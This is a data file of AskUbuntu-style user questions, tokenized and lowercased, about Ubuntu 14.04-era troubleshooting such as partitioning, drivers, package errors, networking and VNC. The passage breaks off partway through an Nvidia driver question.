519808	showing full space as free spcae while installing ubuntu 14.04 ! please help !	im using lenovo yoga pro 2 , 128gb ssd . i need to have ubuntu along side windows 8.1 . my cdrive is 98gb and made an unallocated space of 20gb to install ubuntu . while installing the partition table doesnt shows any drives ( no c : / , , no backup ) and shows 128gb as free space ( that means full ) !
519811	is there a gigabit nic with usb 3.0 adapter which is n't based on asix ax88179 ?	this might seem like a ridiculous question , but i spend now > 2 hours researching google , amazon.com and yahoo in order to find a gigabit nic which can be connected via usb 3.0 to a linux os ( kernel version > = 3.13.x ) . it turns out there a lot of ( > 15 different ) devices ( from > 10 companies ) , but they all are based on the asix a88179 chip ( devices are sold between 12 and 110 âź ... ) . i 'm currently experiencing trouble with two ax88179 based devices and i 'd like to purchase a device in order to debug the issue .
519816	getting hp laptop to work with projector	i have an hp pavilion dm4-2033cl laptop ( specs here ) and am running ubuntu 14.04 lts . i 'm a professor and i need to be able to use my laptop on projectors in different classrooms ( all apparently different models ! ) but so far it is n't going well . i find that when i plug in to the projector by the hdmi cable , my resolution drops down usually to 640x480 , a bit bigger in one classroom . when i plug in by the vga cable , the resolution is fine but the option to `` mirror displays '' is grayed out and i have to treat the projector as a second screen ( i.e . turn my back to the students to give my demo ) . i think this may be a clue to the problem : when i go to settings - > details , the `` graphics '' card is described as `` intel ( r ) sandybridge mobile '' . however , i know from hp that i have an intel hd graphics 3000 card . does this mean i have the wrong driver , and could that plausibly be the problem ? if so , how would i fix it ? this is the video card described in the output of lspci -v : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company device 1650 flags : bus master , fast devsel , latency 0 , irq 44 memory at c0000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at b0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 4000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915
519818	boot repair broke ubuntu	i had windows 7 , and then successfully dual-booted with ubuntu 14.04 , but one day my computer crashed and windows stopped working , so i could only use ubuntu . then i reinstalled windows 7 and it started working again but it disabled grub . so i started ubuntu in live mode and used boot repair . boot repair got grub up and running but ubuntu does n't work now . edit : i get this error when i start ubuntu : gave up waiting for device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert : dev/disk/by-uuid/0537d5f1-c876-4a00-fdc34cef43e2 does not exist . dropping to a shell ! busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs )
519819	xdotool for writing a preformated command in bash	when i run prompt $ xdotool type 'find -iname `` ** '' ' i get this find -iname `` ** '' prompt $ find -iname `` ** '' how could i have that prompt $ find -iname `` ** '' i use xdotool to fill the command line with some pattern that i can complete , it 's like an inputrc shortcut but easier to remember with an alias . it 's work but it 's ugly as you can see . i wonder how to avoid the repetition
519822	getting weird errors after suspend	so , i was running ubuntu from an external usb drive , and i accidentally hit `` suspend '' . when it suspends , it cuts power to the usb ports . now , whenever i start up or try to do anything i get `` ubuntu has recovered from an error . send report ? '' . i can continue most activities normally , but the error keeps reappearing . also , when i tried do an apt-get update , i got an error saying i need to run dpkg -configure -a. i try doing that , but it tells me something is wrong with a file in var/lib/dpkg/updates/ .
519826	new software can not be installed because there is a problem with the software currently installed	i tried to install the ff multi converter by adding `` ppa : ffmulticonverter/stable '' . during the installation something went wrong and now i always get this error mesage when i ope the software center . i can click on repair but then i get the message `` the installation or removal of a software package failed . '' and the details : installarchives ( ) failed : ( reading database ... ( reading database ... 100 % ( reading database ... 241736 files and directories currently installed . ) preparing to unpack ... /shotwell_0.19.0+2604~ubuntu14.04.1_amd64.deb ... unpacking shotwell ( 0.19.0+2604~ubuntu14.04.1 ) over ( 0.18.0-0ubuntu4.1 ) ... dpkg : error processing archive /var/cache/apt/archives /shotwell_0.19.0+2604~ubuntu14.04.1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/share/appdata/shotwell.appdata.xml ' , which is also in package shotwell-common 0.18.0-0ubuntu4.2 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/shotwell_0.19.0+2604~ubuntu14.04.1_amd64.deb error in function : i tried solving the problem via sudo apt-get install -f but it did n't work . and now i ca n't install anything ... any suggestions ?
519827	usb flash drive seemingly fubar	i have encountered a problem , that i have never before encountered . i have a nashua 8gb usb flash drive that i have formatted for different purposes many times . recently i wanted to format it to ntfs and transfer a movie to it so i could watch it on my smarttv . something i have done before with no problems . for some reason , the formatting process stops ( as in just stays at the same percentage completed on the load bar indefinitely ) while i was formatting it with the default disks tool in ubuntu 12.04 . eventually i just cancel the formatting and it unmounts and disappears from the list of media in the disks tool . i pull out the flash drive and insert it again . it seems to work and it appears that the drive has actually been formatted to ntfs , so i just decide to start transferring the movie . it fails , and i end up trying to format it again with no luck . everytime i insert it initially nautilus tries to read it and gives me sorry , could not display all the contents of `` usb-usb_disk2.0 ... .. '' : error when getting information for file `` /mnt/usb-usb_disk2.0 ... ../movie.mkv '' : input/output error everytime i attempt to format it with disks tool it gives me error wiping device : command-linewipefs -a `` /dev/sdb1 '' exited with non-zero exit status 1 : wipefs : error : /dev/sdb1 : probing initialization failed ( udisks-error-quark , 0 ) i have tried with gparted , but had no luck with that either . gave practically the same error . i have also tried various terminal commands suggested on this forum for similar problems . unfortunately do n't remember exactly which . anyone got any ideas ? any suggestions will be appreciated .
519828	using ldap for authentication messes up my powerkvm guest with ubuntu 14.04.01	i was able to create a ubuntu guest under powerkvm and installed 14.04.1 on it . i set up ssh , telnet and set things up so i could log into the root account then i installed the ldap client and tried to log in to one of the ldap accounts but get failures that look to be from a library reference in authentication ( pam ? /python ? ) all of the following detail ( bad things ) happen when i set authentication to ldap in the /etc/nsswitch.conf file . if i remain using local accounts , logins , etc things work just fine . 1 - most importantly , if i reboot , the system hangs with the following message in the console /usr/bin/python3 : symbol lookup error : /lib/powerpc64le-linux-gnu/libnss_ldap.so.2 : undefined symbol : __libc_lock_lock 2 - if i su to the account - su - metheuser segmentation fault 3 - if i ssh or telnet to the server , the following message shows up in the syslog file kernel : [ 146.489209 ] su [ 1000 ] : unhandled signal 11 at 00003fffb6434000 nip 00003fffb64062d4 lr 00003fffb6406298 code 30001 my problem is that i need to set it up for ldap authentication and automount through ldap but am having issues . where do i start ?
519831	attach a failover ip ovh	today i bought 4 ips from ovh for my dedicated server and i want to attach them . the documentation says to add a new auto eth0:0 in to the network/interface but i want to make sure that this is accurate and dont mess anything up ! this is from ovh 's docs : auto eth0:0 iface eth0:0 inet static address ip.de.fail.over netmask 255.255.255.255 broadcast ip.de.fail.over so , for 4 ips i will do eth0:0 eth0:1 eth0:2 eth0:3 and nothing else ? also my current ip has some stuff which i dont really know and dont match with the docs example . auto eth0 iface eth0 inet static address 198.27.67.144 netmask 255.255.255.0 network 198.27.67.0 broadcast 198.27.67.255 gateway 198.27.67.254 the adress is the public ip . i get that . the netmask ovh says to leave it as it is . i dont know what is the network what is the broadcast and what is the gateaway ? also ca i use only the options from ovh 's docs ? thanks for your time : ) oh and the os is ubuntu 14.04
519833	xubuntu laggy/slow in brand new mbp host	i am using xubuntu as a vm in both a windows/pc host and recently a os/x mac host . the latter is laggy , especially when i use two monitors . it 's weird cause the windows machine is less capable ( less ram , no ssd ) i tried a bunch of setting combinations , nothing works . could i blame virtualbox , os/x , or both ? another suspicion is as i exported this vm from the windows one , and i moved it over , if it would matter ... ie would it be better to have a fresh install on the os/x host .
519835	`` airmon-ng start wlan0 '' will not create mon0	i have aircrack-ng 1.1 on ubuntu 14.04 and whenever i use the command `` airmon-ng start wlan0 '' , it always says `` monitor mode enabled '' instead of `` monitor mode enabled on mon0 '' . i checked ifconfig and iwconfig to see if it made another interface name . i have a realtek rtl8187se driver . how can i fix this problem ?
519836	how can i fix hibernate issues without nomodeset being used ?	i have a pc with an i5-4460 cpu , with ubuntu server 14.04.1 installed . by default when the machine restores from hibernate the screen output switches off , the keyboard becomes unresponsive , and the machine stops responding on the network . selecting the boot option nomodeset fixes the situation ; the machine seems to restore state very well . unfortunately i need to run x on this machine , and the on-board vga is naturally provided from an intel controller , therefore ubuntu has selected the i915 module - which requires kms to be present , and wo n't function correctly when nomodeset is used . are there any other approaches to the hibernate-restore failure that do n't end up conflicting with my requirements to run x ?
519838	ubuntu minimal install	every attempt i 've made to install via the minimal install has resulted in a full blown unity install , whereas i simply want the base system , the repositories , and i3wm installed ( of course flash and such would be lovely but that can always be installed through the restricted-extras package ) and then basically configure my system from there ( install my own file manager , music player blah blah blah ) is there something im doing wrong when using the mini iso or is it simply built that way ?
519839	gnuplot does n't work in ubuntu 14.03	i 've upgraded to ubuntu 14.04 few weeks back . i 've installed 'gnuplot ' in my machine . but i can get into the gnuplot prompt however can not get the plot as the our put . it neither shows any error message not any output plot . may you suggest if i need to do something more or i tried it by reinstalling it too .
519843	issuing in running apache2 in chroot environmet	i am trying to run the apache2 server from chroot environment following this link http : //archive09.linux.com/feature/36331 . the only difference is that i started the /usr/sbin/apache2 after getting into the chroot by issuing the command sudo chroot chtest/ ( where chtest is my chroot directory ) and then after /usr/sbin/apache2 . i got the error : apache2 : bad user name www-data however i copied the /etc/passwd and /etc/group file into my chroot file system . i am not able to figure out why the www-data user is not recognized within the chroot environment . any help is appreciated . thanks !
519845	i can not scan from hp deskeskjet 3056a	everything else works great , but scan can not communicate ... have set up everything as well as troubleshoot as website recommends ... still no luck .
519846	why is the install locking up at 38 mins 20 secs for ubuntu 14.04 ?	i 'm trying to install ubuntu 14.04 but first it would't load and now is frozen . i 'm running windows 8.1 on a dell inspiron 660-bts .
519849	how to increase partition size of ubuntu on external harddisk	i just installed ubuntu 14 on my 1.0tb external hd . i only use 700gb for the installation and 20gb for swap . i thought the remaining 280gb will be available for me to store files from windows anytime i wish to do so . but when i logged into windows , it does not see the partition at all . i need the 280gb space back . so i need help on how to make my ubuntu to completely use up the 1.0tb or help on how to make windows see the 280gb space . thank you .
519851	psensor , audible repeating sound for alert alarm ?	when using psensor , is there a way to set an audible repeating sound for alert alarm ? i am using xubuntu 14.04 .
519853	why cant i transfer music to my devices sd card ?	this is the first time i have had to ask for help in ubuntu . when i connect my nokia lumia 625 it mounts and even comes up in rhythmbox ( sweet ) . however when i check properties the sd card is showing 4gb not 32gb . when i transfer music in rhythmbox it transfers to the phone memory not to the sd card . also if i just drag and drop music direct to the sd card music folder ends up crashing or states there is not enough room available ( lies ) . i 'm running 12.04.5 and recently installed mtp tools to get my phone connected . my phone is running windows phone 8.1 .
519854	ubuntu 14.04 screen freezes randomly nvidia	i use ubuntu 14.04 on my asus n550jk laptop and have nvidia geforce gtx 850m graphics card . the problem is that screen keeps randomly freezing while performing everyday tasks . when the screen freezes i can use keyboard to type and after i return from freeze the typed letters will be there . i mean , the system works but the screen wo n't refresh . i ca n't see the mouse pointer moving . i can escape the freeze with ctrl+alt+f2 followed by ctrl+alt+f7 . i have n't managed to find any solution to this problem and it is very annoying . i have the following drivers installed :
519855	read access on a folder without giving execute on parent folder	my os is ubuntu 14.04 . i am trying to give rx permission to a folder for `` others '' without giving any access to the parent folder . in my current attempts users can not read any file in the folder ( which they do have read access ) since they do not have access to the parent folder . is there a way to achieve this ?
519861	lubuntu netbook customization	i have a problem to deal with the appearance of the lnr lubuntu netbook , so i 'd like to put a wallpaper in the background somehow , even if it does n't has a desktop . i will like if you put some customization tips plus , thx .
519863	i cn see 'zfs partition ' through the 'disks ' app , but there is no option to mount . details	the case : i have a notebook with a partitioned hd . i installed debian in one partition , and the other partition was destined to `` /home '' . about a month ago , the `` /home '' partition was corrupted , but it was possible to bring it back through the zfs ( a friend helped me ) . some weeks after that , the debian did n't load anymore ( i coudnt use my pc ) . so i decided to install ubuntu to its side ( in the same partition where the debian was installed ) . fine . i can use my computer now ( with ubuntu ) , but i ca n't access my debian user `` /home '' partition . i can see the partition in the 'disks ' app , but there is no option to mount it . i just installed zpools and the 'zpools status ' results in 'no pools available ' . i understand nothing at all about zfs . that is my main partiton . full of files and projects . how can i access it ? thank you
519864	error when log in my partition ?	** i want to install ubuntu beside my windows 8 but i made a mistake that i installed only ubuntu , but when i logged in ubuntu and went to open my partitions , an error appeared said that `` this partition is in unsafe state and i can not open it '' . **
519865	texmaker `` could not start the command ''	i messed up a bit with teklive and texmaker in my ubuntu 14.04 . i unistalled and re-installed both a couple of times . now , if i go to terminal and do pdflatex -synctex=1 -interaction=nonstopmode test.tex my test.tex file is compiled as it should be . the problem is when i try to do this from texmaker . i get the error message could not start the command . pdflatex -synctex=1 -interaction=nonstopmode % .tex i do n't get it . i added /usr/local/texlive/2014/bin/i386-linux to path -- of course i did , otherwise pdflatex would n't run from the terminal as it did . i do n't know what else to do . i found this question in so but all the answers mentioned installing ( agai ) texlive . i mean , my latex seems to be working , so i do n't see any point in redoing that . i uninstalled and installed again texmaker 4.3 by downloading the appropriate version from here and then doing sudo gdebi texmakerqt5_ubuntu_14.04_4.3_i386 and got no error messages when installing . what 's going on ?
519867	upgrade from firefox 31 to 32 fails	firefox fails to update due to corrupted download ( deb ) preparing to unpack ... /firefox_32.0+build1-0ubuntu0.14.04.1_i386.deb ... unpacking firefox ( 32.0+build1-0ubuntu0.14.04.1 ) over ( 31.0+build1-0ubuntu0.14.04.1 ) ... dpkg-deb ( subprocess ) : decompressing archive member : lzma error : compressed data is corrupt dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg : error processing archive /var/cache/apt/archives/firefox_32.0+build1-0ubuntu0.14.04.1_i386.deb ( -- unpack ) : can not copy extracted data for './usr/lib/firefox/libxul.so ' to '/usr/lib/firefox/libxul.so.dpkg-new ' : unexpected end of file or stream please restart all running instances of firefox , or you will experience problems .
519869	serious problem-unmet dependencies	i was using ubuntu 12.04 lts . i have a little problem , it says e : encountered a section with no package : header , e : problem with mergelist/var/lib/apt/lists/id.archive.ubuntu.com_ubuntu_dists_precise_multiverse_i18n_tranlation-en , e : the package lists or status file could not be parsed or opened . i got it during updating ubuntu . could anyone help this newbie please ? this is my first question btw . : d
519871	full drive encryption using usb wireless mouse dongle	is there any known way to have full drive encryption that will decrypt if my usb mouse dongle is connected ?
519874	i deleted all of my partitions	a few months ago , i had windows 8 as the only operative system on my computer and i wanted to install ubuntu , having both operative systems on my pc ( dual boot ) . however , after supposedly installing ubuntu , i wanted both ubuntu and windows 8 to appear on the screen when booting ( so i could choose which one i wanted to work with ) , and that 's when the problem appeared . in the terminal , i followed a tutorial that could make the dual boot work ( i do n't remember what i wrote ) and , all of a sudden , all of my partitions were gone . i initiated the computer again and it would go straight to the bios . then , after several tries , i somehow installed ubuntu and have been working on it since . however , i know that all of my partitions are messed up and now that i need both windows and ubuntu on my pc , i really need to figure this out . i really appreciate any help that you can give . here 's a print screen of gparted which shows all of the partitions on the computer .
519875	can i control the cooler fan on ubuntu 14.04 ?	ok i 'll be specific my laptop : lenovo z500 processor : intel core i7 ( 3 th ) ram : 8gb gpu : nvidia geforce gt 740 so the question is very simple , how i do my cooler fan more faster ? when i play games with wine or steam always the fan does n't work appropriately , actually is the same speed as normal mode , i want to know why ubuntu does n't recognize the temperature and tries to accelerate the cooling ( is very important , my laptop is burning ! with any game ) please let me know that it can be solved ... on any way ... or my laptop is the problem ? i do n't know please someone help me ! seriously why the fan does n't works ! ps . sorry for my english , i 'm learning : p
519877	cant change mount options in disks	04 server installed i also installed gnome package so i have a ui . anyways i have been trying to get time machine set up so i can back up my mac to my server and i finally got my macbook to recognize it and now it keeps saying osstatus error 2 which means my disk/folder where the back up is going to save to doesnt have the right read/write permissions ... i am using a wd red drive to save backs ups on i have ubuntu installed on an older hdd . anyways the problem is i need to systemwide mount my wd red hdd instead of a /media mount which i believe is user specific . when i go into disks and click the settings ( wheel ) button the `` edit mount options '' is faded so i cant select it . i think i may have installed it wrong or something ... it says `` 2.0 tb unknown '' i created a partition that was suppose to be called `` server '' but its not showing up . please help . thank you .
519880	asked for password when shutting down	today i came across a situation that i have n't encountered before . i tried to shutdown my laptop and it prompted me for my password i 'm running ubuntu 14.04 and have n't had this happen to me for the entire 3 months i 've had this version installed . from what i gathered from google , it only does this when there are multiple users logged into the same machine ? or maybe it was the same username ? i 'm not sure . i 'd like to know if someone else was ssh 'd into my machine though . or if in some way i was being hacked ? the period in which it happened , i was ssh 'd into the hpc cluster at my school to get some homework done ( we 're working with hadoop ! ) . i 'm relatively new to ssh'ing in general , but i can confirm that i do n't remember this ever happening to me before . can someone explain the possible reasons this might have been ?
519883	installing ubuntu from my android phone	i have a smartphone cherrymobile fuze android 4.2.2 from the philippines and i want to upgrade it to ubuntu . is it possible ?
519884	not sure if this is software or hardware related	hey so as it says in the title i 'm not sure if this is an issue with ubuntu 14.4.01 or with my acer aspire e5 571 . the problem is that occasionally when entering my password to unlock the computer from hibernation , the keyboard wo n't seems to register the u or y ( lowercase ) keystrokes . when i restart the computer and am prompted to enter the passcode to decrypt the hard drive , this time the b and v ( uppercase ) keystrokes wo n't register . after i decrypt the hard drive by entering these keystrokes with caps lock instead of using shift , the issue with the u and y seems to have fixed itself , only to happen again later . please help ?
519886	ubuntu 14.04 apache2 how do i restrict some directories to localhost only	after upgrade from 12.04 to 14.04 , my old modified apache2.conf files are in place . i would like to start my configuration over using the default 2.4.7 config files - but i do n't want to overwrite existing - i would like to get them into /tmp so i can examine and start fresh . thanks
519887	system audio is not working whenever i use internet dj console ( idjc )	when i open/start using internet dj console , the sound is working fine when i played a music from dj console player , but when i try to play music or video using default player or vlc for my video , there is no audio at all . i ca n't get back my audio even i closed internet dj console and in order to get the audio back for my system , i must restart my machine . how can i fix this problem without losing my audio in my system even i will open this internet dj console app ? os version : 14.04.1 lts
519888	wifi recognizes networks , and connects , but still does n't work ?	i 've had ubuntu for about 6 months now . it 's been a haste getting used to it as compare to windows . however , yesterday my internet stops working . i 'm connected but firefox , minecraft , and teamspeak does n't connect to the internet . it 's not only those , it 's everything . i have tried restarting the service for network-manager . changing the conf file for networkmanager . i 've rebooted 50+ times . i ca n't find a fix . it will work for a hour when it just miraculously starts working after a reboot . i 'm lost on how to fix this . restarted everything , gnome , wifi card , network manager , my computer . all is insane , i 'm typing this on my phone forgive grammar mistakes . if someone could help me out here , i 'd be very happy .
519890	can the webcam be restricted by a password ?	is it possible to to make using the webcam by applications restricted to the root ? i mean like how one can change permissions for files using chmod . or how you are asked for the password every time you have to install an app or update your system . i would also like to know whether ( if webcams 's use can be restricted ) it is also possible to restrict an application from taking screen shots without your permission . i am using ubuntu 14.04 . thanks in advance
519891	how do i get the drm off of my kindle books via calibre ?	before you ask , i already tried using the de-drm plguin ( http : //apprenticealf.wordpress.com/2012/09/10/drm-removal-tools-for-ebooks/ ) , and sadly it did not solve my problem . i used it back on windows before i converted to ubuntu , but it only worked on .mobi files and not the more widely used .azw files . anyone have any tips as to how i can de-drm my books on ubuntu ? thanks in advance !
519893	ubunto one 12.0.4 update manager	when i want to update my ubuntu package i get the following error when running the update manager packadge . could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/za.archive.ubuntu.com_ubuntu_dists_precise-updates_multiverse_binary-amd64_packages , e : the package lists or status file could not be parsed or opened . ' can anybody please assist
519897	prevent *buntu from updating dictionaries during install	in utilizing vagrant to install an ubuntu server box with a gui ( lxde ) , the shell provisioning fails due to what seems to be a frequent issue when setting up dictionaries . the resolutions seem to all point to running scripts after the error has occurred , but this defeats the smooth automation script i 'm after . is there anyway to prevent this step from taking place ( all my apt-get installs are run with -q -y , in case that is related ) . is this related to x11 or to a specific desktop ? i would not mind changing de 's to get around this ... vagrant log : == > development_environment : setting up dictionaries-common ( 1.12.1ubuntu2 ) ... == > development_environment : update-default-wordlist : question empty but elements installed for class `` wordlist '' == > development_environment : dictionaries-common/default-wordlist : return code : `` 0 '' , value : `` '' == > development_environment : choices : , manual symlink setting == > development_environment : shared/packages-wordlist : return code : `` 10 '' owners/error : `` shared/packages-wordlist does n't exist '' == > development_environment : installed elements : english ( webster 's second international english wordlist ) == > development_environment : == > development_environment : please see `` /usr/share/doc/dictionaries-common/readme.problems '' , section == > development_environment : `` debconf database corruption '' for recovery info . == > development_environment : update-default-wordlist : selected wordlist `` '' == > development_environment : does not correspond to any installed package in the system == > development_environment : and no alternative wordlist could be selected . == > development_environment : dpkg : error processing dictionaries-common ( -- configure ) : == > development_environment : subprocess installed post-installation script returned error exit status 255 == > development_environment : dpkg : dependency problems prevent configuration of miscfiles : == > development_environment : miscfiles depends on dictionaries-common ( > = 0.20 ) ; however : == > development_environment : package dictionaries-common is not configured yet . == > development_environment : dpkg : error processing miscfiles ( -- configure ) : == > development_environment : dependency problems - leaving unconfigured == > development_environment : no apport report written because the error message indicates its a followup error from a previous failure . == > development_environment : errors were encountered while processing : == > development_environment : dictionaries-common == > development_environment : miscfiles == > development_environment : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) == > development_environment : == > development_environment : ( lxsession:1514 ) : gtk-warning ** : can not open display : the following ssh command responded with a non-zero exit status . vagrant assumes that this means the command failed ! chmod +x /tmp/vagrant-shell & & /tmp/vagrant-shell stdout from the command : reading package lists ... building dependency tree ... reading state information ... the following extra packages will be installed : libfs6 libglu1-mesa x11-apps x11-session-utils x11-xfs-utils xfonts-scalable xinit xinput xorg-docs-core suggested packages : mesa-utils xorg-docs xfonts-100dpi xfonts-75dpi the following new packages will be installed : libfs6 libglu1-mesa x11-apps x11-session-utils x11-xfs-utils xfonts-scalable xinit xinput xorg xorg-docs-core 0 upgraded , 10 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 1,448 kb of archives . after this operation , 4,064 kb of additional disk space will be used . do you want to continue [ y/n ] ? abort . reading package lists ... building dependency tree ... reading state information ... lxde is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up dictionaries-common ( 1.12.1ubuntu2 ) ... stderr from the command : stdin : is not a tty update-default-wordlist : question empty but elements installed for class `` wordlist '' dictionaries-common/default-wordlist : return code : `` 0 '' , value : `` '' choices : , manual symlink setting shared/packages-wordlist : return code : `` 10 '' owners/error : `` shared/packages-wordlist does n't exist '' installed elements : english ( webster 's second international english wordlist ) please see `` /usr/share/doc/dictionaries-common/readme.problems '' , section `` debconf database corruption '' for recovery info . update-default-wordlist : selected wordlist `` '' does not correspond to any installed package in the system and no alternative wordlist could be selected . dpkg : error processing dictionaries-common ( -- configure ) : subprocess installed post-installation script returned error exit status 255 dpkg : dependency problems prevent configuration of miscfiles : miscfiles depends on dictionaries-common ( > = 0.20 ) ; however : package dictionaries-common is not configured yet . dpkg : error processing miscfiles ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : dictionaries-common miscfiles e : sub-process /usr/bin/dpkg returned an error code ( 1 )
519898	fn key for setting brightness in ubuntu 14.04 lts is not working for asus x550ld	i am facing the above problem only for brightness control . rest all the controls with fn key are working . i dont want to create new shortcuts like ctrl+f5 or ctrl+f6 . i want that it should happen with fn key only ( as displayed on my keyboard ) . please help me on this ... .
519899	how to configure ssh username and pass on ubuntu server 14.04.1	i am trying to remotely administer my server using ssh . i believe ssh comes installed default , i just need to know how to configure username and password .
519906	environment variable or saving dev_key file	i am slightly new to ubuntu , i have a nasa-ads dev_key to access some data on there system but am unable to : save it as an environment variable named ads_dev_key or save it to a file called ~/.ads/dev_key after following the instructions in link https : //pypi.python.org/pypi/ads/0.0.809 for the first option : i do n't know any thing about how to save an environment variable naming ads_dev_key for 2nd option i am unable to locate any directory naming .ads where i should save the text file for available key . note : when i import installed ads library to python it gives me this error : traceback ( most recent call last ) : file `` < pyshell # 0 > '' , line 1 , in < module > import ads file `` /home/sibte/.local/lib/python2.7/site-packages/ads/__init__.py '' , line 9 , in < module > import network file `` /home/sibte/.local/lib/python2.7/site-packages/ads/network.py '' , line 15 , in < module > from core import search file `` /home/sibte/.local/lib/python2.7/site-packages/ads/core.py '' , line 19 , in < module > dev_key = utils.get_dev_key ( ) file `` /home/sibte/.local/lib/python2.7/site-packages/ads/utils.py '' , line 31 , in get_dev_key raise ioerror ( `` no ads api key found in ~/.ads/dev_key and no ads_dev_key `` \ ioerror : no ads api key found in ~/.ads/dev_key and no ads_dev_key environment variable found any help ( preferably simple ) regarding this issue ?
519907	d-link dwa 123 n 150 ( rev d1 ) wireless adapter issues	i have a d-link dwa 123 n 150 ( rev d1 , 4.00 ) wireless adapter and i ca n't make it work on ubuntu . where can i get the proper drivers and how do i install those ?
519911	how i can set proxy in my virtual box for android	i am currently using ubuntu 12.04 as my host .i have to set proxy address in my office network to access internet and i would like to set proxy address and port in my virtual box to run android.i have already set proxy address and port ( 172.16.0.254:8080 ) in my oracle virtual box and i am using nat network adapter pcnet-fast iii for android but i can not access internet.i tested bridged adapter setting also but result is same.can any body help me to access internet behind proxy for my android in the virtual machine .
519912	vncserver prompts for password every time	i am a linux noob , and i am performing some tasks for the very first time . i have a bash script that uses vncserver ( so i would prefer to stay with vncserver ) . the script used to work properly when called manually . after fiddling with cronjobs ( to schedule running the script ) and postfix for the first time i seemed to have caused a problem with vncserver . it prompts for a password every time and gives an error . if this is permissions related i followed this link 's advice to chmod just my scripts directory 755 and files 644. http : //stackoverflow.com/questions/3740152/how-to-set-chmod-for-a-folder-and-all-of-its-subfolders-and-files-in-linux-ubunt any ideas where i went wrong ? $ ./ [ myscript ] .sh you will require a password to access your desktops . password : verify : could n't open /home/ [ username ] /.vnc/passwd for writing
519913	ubuntu 14.04 auto off wifi	currently whenever i try to open the wireless network , it is automatically off the wifi and i ca n't access the wifi . i tried to use the wireless adapter , the adapter shows perfectly in the ubuntu 14.04 but it also off automatically . i use lxde as my de . thanks guys : )
519914	how to change username on 14.04.1	i would like to change the name that i see when logging in . for some reason when setting up ubuntu it ask you for a username but then it uses your real name instead as a username , why is it done this way ? anyways , how can i change my login name ?
519915	installing ubuntu on windows with no cd drive ... help	so i downloaded ubuntu to install and replace my windows partition . i do not have a cd drive . can i just run the installation from the desktop ? i 'm a longtime mac user , so i 'm a little bit lost with windows . i have had a dual partition before with wubi , but i would like to just have ubuntu on my laptop . everytime i try to run the ubuntu program that i downloaded , it sends me to discmaker . not sure what i 'm doing wrong and would like some guidance , thanks ! : )
519917	how do i limit fps in games ?	like the title says , i want to know if i can do that on ubuntu . ( on windows , i used to do it using nvidia inspector . ) i have a lenovo y580 , with intel 4000hd and gtx 660m . i am talking about limiting to 30fps or 45 . thank you . edit : - but i know about vsync the thing is that i want to do that because i downvolted my gpu and downclocked it too @ v0.85 ( @ 810/2000 ) so when i play dota its fine it stays 60fps but when i play games like `` interstellar marines '' my fps keeps dropping and jumping and i hate that and the reason i downvolted my gpu is my labtop become too hot 90+c while gaming so yeah , i tried re paste many times dunno whats wrong it never works , again thank you : )
519919	how to run executables directly from nautilus ?	when i write c codes in geany and the build and then run the program from there using the buttons there , it works fine . again i can run the compiled executables using ./file_name command from terminal emulator . but when i double click on the executable from nautilus , nothing happens . i have also checked `` allow executing the file as a program '' from the properties menu . but the problem still exists .
519920	how to run an -- up script using network-manager-openvpn ?	i 'm using network-manager-openvpn ( w ubuntu 14.04 ) to manage vpn connections ( client end ) . i need to run a script when a vpn is activated to fix some routing issues . i know how to do this using openvpn config options ( -- script-security 2 -- up /script.. ) but i can not figure out a sensible way with network-manager in the mix . is there a `` recommended '' way to approach this without reverting to pre-network-manager config files ? or is there a suggested way to detect that the vpn has come up and hence triggering an action ( something a bit more elegant than firing off a cron to look at the status every minute would be appreciated ! ) ?
519921	fail to update or install software 12.10 quantal	can someone help , i cant install new software . sudo apt-get update shows e : some index files failed to download . they have been ignored , or old ones used instead . `
519922	askubuntu.com profile does n't accept unicode character as name	i am from myanmar and i try to update my display name in myanmar language but it does n't accept the unicode character and it only accepts english characters . how to solve it ?
519925	low speed ubuntu after install	after installing ubuntu on the locate system speed is slowed and doing everything slow ubuntu is version 12 and i would enable the second graphics via the keyboard , i can more quickly how was the problem solved i use kde programs , but not exactly
519927	nvidia driver not working after upgrade	i ran a standard apt-get upgrade yesterday . since then , the nvidia drivers ( nvidia-331-updates ) do n't seem to work anymore . i did some digging and tried re-installing the drivers in different versions as well as booting different kernels . i can see that it fails to load the nvidia module /var/log/xorg.0.log [ 2127.801 ] ( ii ) loadmodule : `` nvidia '' [ 2127.801 ] ( ww ) warning , could n't open module nvidia [ 2127.801 ] ( ii ) unloadmodule : `` nvidia '' [ 2127.801 ] ( ii ) unloading nvidia [ 2127.801 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) i then tried updating the alternatives : ~ > > sudo update-alternatives -- config x86_64-linux-gnu_gl_conf [ sudo ] password for ingo : there are 3 choices for the alternative x86_64-linux-gnu_gl_conf ( providing /etc/ld.so.conf.d/x86_64-linux-gnu_gl.conf ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0 /usr/lib/nvidia-331-updates/ld.so.conf 8604 auto mode 1 /usr/lib/nvidia-331-updates-prime/ld.so.conf 8603 manual mode 2 /usr/lib/nvidia-331-updates/ld.so.conf 8604 manual mode * 3 /usr/lib/x86_64-linux-gnu/mesa/ld.so.conf 500 manual mode if i set this to 0 , i have my nvidia binaries back in the path and can , e.g. , run nvidia-xconfig ( which i ca n't otherwise ) . i can also successfully probe the module via sudo modprobe nvidia , which 